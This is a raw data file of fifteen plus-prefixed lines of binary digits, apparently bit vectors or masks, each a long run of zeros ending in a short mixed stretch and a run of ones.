+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011001000110010011110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010100110101011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000110101011000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000110000011001110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101110001010111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000001100001110111101111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000001000110100111011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100001000110101010111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011001000000000000000000000000000000000000000000000000000000000000001010001100001011111111111111111111111111111111111111111111111111 